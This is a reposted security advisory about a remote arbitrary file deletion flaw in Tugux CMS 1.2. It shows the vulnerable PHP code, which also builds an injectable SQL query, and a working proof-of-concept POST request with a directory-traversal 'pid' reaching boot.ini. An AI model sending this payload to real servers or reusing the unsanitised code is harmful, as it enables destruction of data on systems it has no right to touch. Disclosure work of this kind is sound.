Tugux CMS 1.2 (pid) 任意文件删除缺陷及修复漏洞预警 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

   

    Tugux CMS 1.2 (pid) Remote Arbitrary File Deletion Vulnerability

    Vendor: Tugux Studios

    Product web page: http://www.tugux.com

    Affected version: 1.2

    Summary: Tugux CMS 是一款免费开源的内容管理系统

    (CMS) and application that powers the entire web.

    Desc: Input passed to the 'pid' parameter in administrator/delete_page_parse.php

    is not properly sanitised before being used to delete files. This can be exploited

    to delete files with the permissions of the web server via directory traversal

    sequences passed within the 'pid' parameter.

    ------------------------------------------------------------------------------

    /administrator/delete_page_parse.php:

    ------------------------------------------------------------------------------

    1:

    2: ///post form. data

    3: $id=$_POST['pid'];

    4:

    5: $pic1 = ("slides/$id/image_01.jpg");

    6: if (file_exists($pic1)) {

    7:     unlink($pic1);

    8:  }

    9: $dir = "slides/$id";

    10:  rmdir($dir);

    11:

    12: include_once "../scripts/connect_to_mysql.php";

    13: $query = mysqli_query($myConnection, "DELETE FROM pages WHERE id='$id' ") or die (mysqli_error($myConnection));

    14: echo '

    15:

    16: Operation completed.Your page has been DELETED.

    17: Click Here to go back';

    18: exit();

    19: ?>

    ------------------------------------------------------------------------------

    Tested on: Microsoft Windows XP Professional SP3 (EN)

    Apache 2.2.14 (Win32)

    PHP 5.3.1

    MySQL 5.1.41

    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

    liquidworm gmail com

    Zero Science Lab

    Advisory ID: ZSL-2011-5024

    Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5024.php

    02.04.2011

    --

    POST /tugux/administrator/delete_page_parse.php HTTP/1.1

    Host: www.2cto.com

    Proxy-Connection: keep-alive

    User-Agent: x

    Content-Length: 175

    Cache-Control: max-age=0

    Origin: null

    Content-Type: multipart/form-data; boundary=----x

    Accept: text/html

    Accept-Language: en-US,en;q=0.8

    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

    ------x

    Content-Disposition: form-data; name="pid"

    ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../boot.ini

    ------x--

最新文章